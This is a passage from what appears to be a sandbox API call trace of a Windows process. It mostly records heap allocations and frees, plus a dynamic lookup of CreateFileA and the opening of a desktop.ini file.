returned 0x8e1ad0 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0158.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0158.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0158.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0158.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0158.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0158.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0158.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0158.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0158.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0158.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0158.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0158.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0158.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.742] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0158.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0158.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9e38 [0158.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9e38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0158.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.742] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0158.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0158.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0158.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0158.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9e38 [0158.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9e38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0158.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.743] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0158.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0158.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0158.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0158.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0158.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0158.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0158.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0158.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0158.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0158.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x32) returned 0x90ad98 [0158.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", cchWideChar=50, lpMultiByteStr=0x90ad98, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", lpUsedDefaultChar=0x0) returned 50 [0158.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0158.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0158.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0158.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0158.744] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0158.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0158.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0158.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0158.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0158.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0158.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0158.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0158.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0158.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0158.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0158.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=50, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0158.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x64) returned 0x8e8320 [0158.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=50, lpWideCharStr=0x8e8320, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 50 [0158.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0158.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0158.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0158.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0158.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0158.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0158.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0158.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0158.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0158.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0158.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0158.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0158.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0158.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0158.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0158.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0158.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0158.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0158.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0158.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0158.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0158.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0158.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0158.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0158.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0158.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0158.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0158.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0158.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0158.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0158.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0158.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0158.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0158.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0158.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0158.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0158.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0158.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0158.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0158.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0158.755] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0158.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0158.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0158.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0158.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0158.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0158.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0158.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.757] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0158.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0158.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0158.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0158.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0158.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0158.757] HeapFree 